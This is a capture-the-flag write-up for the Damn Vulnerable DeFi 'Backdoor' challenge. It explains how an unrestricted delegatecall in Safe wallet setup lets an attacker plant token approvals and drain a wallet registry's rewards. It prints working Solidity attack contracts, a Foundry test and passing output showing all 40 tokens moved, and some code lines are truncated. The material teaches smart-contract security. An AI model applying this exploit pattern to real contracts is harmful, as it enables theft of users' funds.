To incentivize the creation of more secure wallets in their team, someone has deployed a registry of Safe wallets. When someone in the team deploys and registers a wallet, they earn 10 DVT tokens.
The registry tightly integrates with the legitimate Safe Proxy Factory. It includes strict safety checks.
Currently there are four people registered as beneficiaries: Alice, Bob, Charlie and David. The registry has 40 DVT tokens in balance to be distributed among them.
Uncover the vulnerability in the registry, rescue all funds, and deposit them into the designated recovery account. In a single transaction.
Create a safe wallet (call createProxyWithCallback
in the SafeProxyFactory
) -> execute setup
function in Safe
contract -> execute the callback function (e.g. proxyCreated
in the WalletRegistry
In the WalletRegistry
contract, there is a proxyCreated
function, which serves as a callback triggered when a proxy is created via the createProxyWithCallback
function in the SafeProxyFactory
The proxyCreated
function verifies certain conditions for the newly created wallet. If the wallet meets the required conditions, 10 DVT tokens are transferred to the created wallet, as shown below:
* @notice Function executed when user creates a Safe wallet via SafeProxyFactory::createProxyWithCallback
* setting the registry's address as the callback.
function proxyCreated(SafeProxy proxy, address singleton, bytes calldata initializer, uint256) external override {
if (token.balanceOf(address(this)) < PAYMENT_AMOUNT) {
// fail early
revert NotEnoughFunds();
address payable walletAddress = payable(proxy);
// Ensure correct factory and copy
if (msg.sender != walletFactory) {
revert CallerNotFactory();
if (singleton != singletonCopy) {
revert FakeSingletonCopy();
// Ensure initial calldata was a call to `Safe::setup`
if (bytes4(initializer[:4]) != Safe.setup.selector) {
revert InvalidInitialization();
// Ensure wallet initialization is the expected
uint256 threshold = Safe(walletAddress).getThreshold();
if (threshold != EXPECTED_THRESHOLD) {
revert InvalidThreshold(threshold);
address[] memory owners = Safe(walletAddress).getOwners();
if (owners.length != EXPECTED_OWNERS_COUNT) {
revert InvalidOwnersCount(owners.length);
// Ensure the owner is a registered beneficiary
address walletOwner;
unchecked {
walletOwner = owners[0];
if (!beneficiaries[walletOwner]) {
revert OwnerIsNotABeneficiary();
address fallbackManager = _getFallbackManager(walletAddress);
if (fallbackManager != address(0)) {
revert InvalidFallbackManager(fallbackManager);
// Remove owner as beneficiary
beneficiaries[walletOwner] = false;
// Register the wallet under the owner's address
wallets[walletOwner] = walletAddress;
// Pay tokens to the newly created wallet
SafeTransferLib.safeTransfer(address(token), walletAddress, PAYMENT_AMOUNT);
The important conditions that must be met are:
- The
function must be called by the walletFactory (e.g., theSafeProxyFactory
contract). - The singleton must be a
contract. - The
must be a calldata to thesetup
function in theSafe
The createProxyWithCallback
function in the SafeProxyFactory
contract deploys a proxy contract using the _singleton
and saltNonce
parameters. It can also execute a low-level call with the initializer
data on the new proxy and invoke a callback at a specified address, as shown below:
function createProxyWithCallback(
address _singleton,
bytes memory initializer,
uint256 saltNonce,
IProxyCreationCallback callback
) public returns (SafeProxy proxy) {
uint256 saltNonceWithCallback = uint256(keccak256(abi.encodePacked(saltNonce, callback)));
proxy = createProxyWithNonce(_singleton, initializer, saltNonceWithCallback);
if (address(callback) != address(0)) callback.proxyCreated(proxy, _singleton, initializer, saltNonce);
The WalletRegistry
contract requires creating a safe wallet and calling the setup
function in the Safe
contract during the wallet creation process, the setup
function shown as below:
function setup(
address[] calldata _owners,
uint256 _threshold,
address to,
bytes calldata data,
address fallbackHandler,
address paymentToken,
uint256 payment,
address payable paymentReceiver
) external {
// setupOwners checks if the Threshold is already set, therefore preventing that this method is called twice
setupOwners(_owners, _threshold);
if (fallbackHandler != address(0)) internalSetFallbackHandler(fallbackHandler);
// As setupOwners can only be called if the contract has not been initialized we don't need a check for setupModules
setupModules(to, data);
if (payment > 0) {
// To avoid running into issues with EIP-170 we reuse the handlePayment function (to avoid adjusting code of that has been verified we do not adjust the method itself)
// baseGas = 0, gasPrice = 1 and gas = payment => amount = (payment + 0) * 1 = payment
handlePayment(payment, 0, 1, paymentToken, paymentReceiver);
emit SafeSetup(msg.sender, _owners, _threshold, to, fallbackHandler);
function setupModules(address to, bytes memory data) internal {
require(modules[SENTINEL_MODULES] == address(0), "GS100");
if (to != address(0)) {
require(isContract(to), "GS002");
// Setup has to complete successfully or transaction fails.
require(execute(to, 0, data, Enum.Operation.DelegateCall, type(uint256).max), "GS000");
function execute(
address to,
uint256 value,
bytes memory data,
Enum.Operation operation,
uint256 txGas
) internal returns (bool success) {
if (operation == Enum.Operation.DelegateCall) {
// solhint-disable-next-line no-inline-assembly
assembly {
success := delegatecall(txGas, to, add(data, 0x20), mload(data), 0, 0)
} else {
// solhint-disable-next-line no-inline-assembly
assembly {
success := call(txGas, to, value, add(data, 0x20), mload(data), 0, 0)
During the wallet creation process, we notice that in the Safe
contract's setup
function, a delegatecall can be made to the address to through the setupModules
function. This call is unrestricted, providing an opportunity to exploit the process.
After the safe wallet is created, it will receive 10 DVT tokens from the WalletRegistry
. To exploit this, we can inject a malicious token approval by leveraging the delegatecall to execute the approval through a malicious contract. However, simply using delegatecall to call the DVT contract’s approve method won’t change the DVT allowance, as the delegatecall operates in the context of the WalletRegistry
and not the DVT contract itself.
To bypass this limitation, the attacker can deploy a malicious contract designed to call the DVT contract’s approve function. By directing the delegatecall to this malicious contract, it can then invoke the approve method on the DVT contract, effectively altering the allowance and gaining control over the DVT tokens.
- Deploy a malicious contract that only deal with token approval
- Use crafted setup calldata to trigger token approval via the malicious contract during the
wallet creation. - Transfer the approved DVT tokens to the attacker's recovery address.
// SPDX-License-Identifier: MIT
pragma solidity =0.8.25;
import {WalletRegistry} from "./WalletRegistry.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {Safe} from "@safe-global/safe-smart-account/contracts/Safe.sol";
import {SafeProxyFactory} from "@safe-global/safe-smart-account/contracts/proxies/SafeProxyFactory.sol";
contract MaliciousApprove {
function approve(address token, address spender) external {
IERC20(token).approve(spender, 10 ether);
contract AttackWalletRegistry {
address private immutable token;
address private immutable singletonCopy;
address private immutable walletFactory;
address private immutable walletRegistry;
address private immutable recovery;
address private immutable maliciousApprove;
address[] private users;
address _token,
address _singletonCopy,
address _walletFactory,
address _walletRegistry,
address _recovery,
address[] memory _users
) {
token = _token;
singletonCopy = _singletonCopy;
walletFactory = _walletFactory;
walletRegistry = _walletRegistry;
recovery = _recovery;
users = _users;
maliciousApprove = address(new MaliciousApprove());
address[] memory owners = new address[](1);
address wallet;
for (uint256 i; i < 4; ++i) {
owners[0] = users[i];
// craft a calldata to call maliciousApprove during Safe wallet setup
bytes memory data = abi.encodeCall(
maliciousApprove, // the address must be a contract, or the safe wallet setup will revert.
abi.encodeCall(MaliciousApprove.approve, (token, address(this))),
wallet = address(
address(singletonCopy), data, i, WalletRegistry(walletRegistry)
IERC20(token).transferFrom(wallet, recovery, 10 ether);
// SPDX-License-Identifier: MIT
// Damn Vulnerable DeFi v4 (
pragma solidity =0.8.25;
import {Test, console} from "forge-std/Test.sol";
import {Safe} from "@safe-global/safe-smart-account/contracts/Safe.sol";
import {SafeProxyFactory} from "@safe-global/safe-smart-account/contracts/proxies/SafeProxyFactory.sol";
import {DamnValuableToken} from "../../src/DamnValuableToken.sol";
import {WalletRegistry} from "../../src/backdoor/WalletRegistry.sol";
import {AttackWalletRegistry} from "../../src/backdoor/AttackWalletRegistry.sol";
contract BackdoorChallenge is Test {
address deployer = makeAddr("deployer");
address player = makeAddr("player");
address recovery = makeAddr("recovery");
address[] users = [makeAddr("alice"), makeAddr("bob"), makeAddr("charlie"), makeAddr("david")];
uint256 constant AMOUNT_TOKENS_DISTRIBUTED = 40e18;
DamnValuableToken token;
Safe singletonCopy;
SafeProxyFactory walletFactory;
WalletRegistry walletRegistry;
modifier checkSolvedByPlayer() {
vm.startPrank(player, player);
function setUp() public {
// Deploy Safe copy and factory
singletonCopy = new Safe();
walletFactory = new SafeProxyFactory();
// Deploy reward token
token = new DamnValuableToken();
// Deploy the registry
walletRegistry = new WalletRegistry(address(singletonCopy), address(walletFactory), address(token), users);
// Transfer tokens to be distributed to the registry
token.transfer(address(walletRegistry), AMOUNT_TOKENS_DISTRIBUTED);
function test_assertInitialState() public {
assertEq(walletRegistry.owner(), deployer);
assertEq(token.balanceOf(address(walletRegistry)), AMOUNT_TOKENS_DISTRIBUTED);
for (uint256 i = 0; i < users.length; i++) {
// Users are registered as beneficiaries
// User cannot add beneficiaries
vm.expectRevert(0x82b42900); // `Unauthorized()`
function test_backdoor() public checkSolvedByPlayer {
emit log("-------------------------- Before exploit --------------------------");
emit log_named_decimal_uint(
"token balance in the wallet registry", token.balanceOf(address(walletRegistry)), token.decimals()
emit log_named_decimal_uint(
"token balance in the recovery address", token.balanceOf(recovery), token.decimals()
AttackWalletRegistry maliciousContract = new AttackWalletRegistry(
address(token), address(singletonCopy), address(walletFactory), address(walletRegistry), recovery, users
emit log("-------------------------- After exploit --------------------------");
emit log_named_decimal_uint(
"token balance in the wallet registry", token.balanceOf(address(walletRegistry)), token.decimals()
emit log_named_decimal_uint(
"token balance in the recovery address", token.balanceOf(recovery), token.decimals()
function _isSolved() private view {
// Player must have executed a single transaction
assertEq(vm.getNonce(player), 1, "Player executed more than one tx");
for (uint256 i = 0; i < users.length; i++) {
address wallet = walletRegistry.wallets(users[i]);
// User must have registered a wallet
assertTrue(wallet != address(0), "User didn't register a wallet");
// User is no longer registered as a beneficiary
// Recovery account must own all tokens
assertEq(token.balanceOf(recovery), AMOUNT_TOKENS_DISTRIBUTED);
Ran 2 tests for test/backdoor/Backdoor.t.sol:BackdoorChallenge
[PASS] test_assertInitialState() (gas: 55670)
[PASS] test_backdoor() (gas: 2080322)
-------------------------- Before exploit --------------------------
token balance in the wallet registry: 40.000000000000000000
token balance in the recovery address: 0.000000000000000000
-------------------------- After exploit --------------------------
token balance in the wallet registry: 0.000000000000000000
token balance in the recovery address: 40.000000000000000000
Suite result: ok. 2 passed; 0 failed; 0 skipped; finished in 11.99ms (3.95ms CPU time)
Ran 1 test suite in 243.77ms (11.99ms CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)